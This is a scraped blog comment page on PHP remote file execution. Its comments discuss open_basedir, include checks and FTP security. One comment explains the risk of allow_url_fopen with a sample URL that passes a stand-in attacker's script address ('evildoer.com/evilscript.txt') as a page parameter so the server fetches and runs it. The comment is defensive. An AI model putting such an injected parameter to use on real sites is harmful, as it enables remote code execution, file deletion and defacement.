DISQUS

Hello! Technosailor is using DISQUS, a powerful comment system, to manage its comments. Learn more.

Community Page

technosailor.com Jump to website »

Subscribe
- New Comments
Community
Top Commenters
- Aaron Brazell
  119 comments · 7 points
- Jim "Genuine" Turner
  31 comments · 1 points
- Mark 'Rizzn' Hopkins
  11 comments · 12 points
- rcapece
  9 comments · 1 points
- Jay Cuthrell
  8 comments · 3 points
Popular Threads
Recent Comments
- Interesting article and comments. A couple of things to consider: 1. Open Office 3.0 for the Mac or Google Docs 2. The faster startup (boot and hibernating) and lack of crashing OS can really...
  8 months ago by dcpatton
  
  in Even During a Recession, Small Businesses Still Should Consider Macbooks
- I really like the approach you've taken into prove the price specifications, cause at the end of the day, it is a yesterdays fact, that Mac is more expensive than PC, nevertheless you have...
  8 months ago by iaaxpage
  
  in Even During a Recession, Small Businesses Still Should Consider Macbooks
- I didn't know you were a fanboy. When did that happen?
  8 months ago by Peter Davis
  
  in Even During a Recession, Small Businesses Still Should Consider Macbooks
- You can create PDFs with a little program called PDF Converter 5 Pro from Buy.com for $99. Throw in a copy of OpenOffice software and the Dell is cheaper than the Apple. I don't buy it.
  8 months ago by thatedeguy
  
  in Even During a Recession, Small Businesses Still Should Consider Macbooks
- Totally agree that many companies should not consider the Apple solution. That said, most 'no' answers are based on the pricepoint of hardware and in many cases, the TCO is actually cheaper...
  8 months ago by Aaron Brazell
  
  in Even During a Recession, Small Businesses Still Should Consider Macbooks

Technosailor

Jump to original thread »

Author

Lessons in Web Security: PHP and Remote File Execution

Started by Aaron Brazell · 11 months ago

No excerpt available. Jump to website »

3 comments

Matt Thornton
4 years ago

Ah yes open_basedir(), figured you'd mention that. Nice idea to use file_exists to check a file before including it. I s'pose there's lot of stuff you could do, like checking the $_SERVER["DOCUMENT_ROOT"] or the HOSTNAME to check the file is coming from itself.

Are you gonna do anything on FTP security? Not being much of a security buff myself, but thinking about it, were someone able to gain FTP access (don't know but with register_globals on, could you pass a system command through a $_GET equiv, or guest accounts/public_ftp etc.) then they could upload whatever they wanted and have away with your system.

And you might want to mention for the more n00b programmers out there to give all includes a .php extension (and not a .inc, for example ;) :p).

Matt

Aaron
4 years ago

Hey Matt,

Checking $_SERVER[â€™DOCUMENT_ROOTâ€™] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)

Leave a Comment

Robert Mathews
3 years ago

Here's a simple example of why allow_url_fopen is a problem in the real world.

I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like "http://www.example.com/index.php?page=page5.html".

All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

Add New Comment

Comments are closed for this post.

Returning? Login